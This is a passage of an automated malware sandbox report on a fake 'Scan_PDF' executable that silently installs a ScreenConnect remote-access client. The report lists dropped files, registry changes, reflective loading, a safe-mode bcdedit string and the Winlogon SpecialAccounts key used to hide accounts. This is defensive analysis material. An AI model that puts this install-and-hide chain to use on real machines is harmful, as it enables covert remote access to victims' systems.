                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI6E42.tmp.2.dr, 4a71ee.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Scan_PDF_5255303072.exe
                              Source: Scan_PDF_5255303072.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: Scan_PDF_5255303072.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: Scan_PDF_5255303072.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: Scan_PDF_5255303072.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: Scan_PDF_5255303072.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.0.Scan_PDF_5255303072.exe.8b78f8.3.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: Scan_PDF_5255303072.exeStatic PE information: real checksum: 0x54fd91 should be: 0x57ab8f
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_01926F00 push eax; mov dword ptr [esp], ecx0_2_01926F11
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05AE53E8 push eax; retf 0_2_05AE54D9
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05B02F58 push eax; mov dword ptr [esp], edx0_2_05B02F6C
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeCode function: 0_2_05B01A91 push eax; mov dword ptr [esp], ecx0_2_05B01AA1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01AD7732 push eax; iretd 8_2_01AD7739
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01AD7752 push 84041CCFh; iretd 8_2_01AD7759
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_043742C8 push ebx; ret 8_2_043742DA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C07D0A pushad ; retf 8_2_05C07D11
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C07448 pushfd ; ret 8_2_05C07451
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C02032 push esp; ret 8_2_05C02043
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C07322 push eax; ret 8_2_05C07329
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C150A0 push edi; retn 5505h8_2_05C150CE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C1D070 push cs; ret 8_2_05C1D27A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C135C8 push ebx; retn 0005h8_2_05C135D2
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C135D7 push ebx; retn 0005h8_2_05C135E2
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C135E7 push ebx; retn 0005h8_2_05C135F2
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C1378F push edi; retn 0005h8_2_05C1379A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C1379F push edi; retn 0005h8_2_05C137AA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C13748 pushad ; retn 0005h8_2_05C1376A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C13643 push ecx; retn 0005h8_2_05C1365A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C1365F push edx; retn 0005h8_2_05C1366A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C1360F push esp; retn 0005h8_2_05C1361A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C13629 push ebp; retn 0005h8_2_05C1362A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C1362F push esp; retn 0005h8_2_05C1361A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C15D08 pushad ; ret 8_2_05C15D09
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05C15D0B push esp; ret 8_2_05C15D11
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB100874E3 push ebx; iretd 9_2_00007FFB1008753A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB10083BCA push FFFFFFE8h; retf 9_2_00007FFB10083CC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB10438139 push ebx; ret 9_2_00007FFB1043813A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB10073BCB push FFFFFFE8h; retf 10_2_00007FFB10073CC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB100774E3 push ebx; iretd 10_2_00007FFB1007753A
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A98.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74FA.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A98.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI74FA.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.1390246679.000000000431C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1503870497.000000001B062000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486251470.00000000023D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1506311870.000000001B332000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: Scan_PDF_5255303072.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
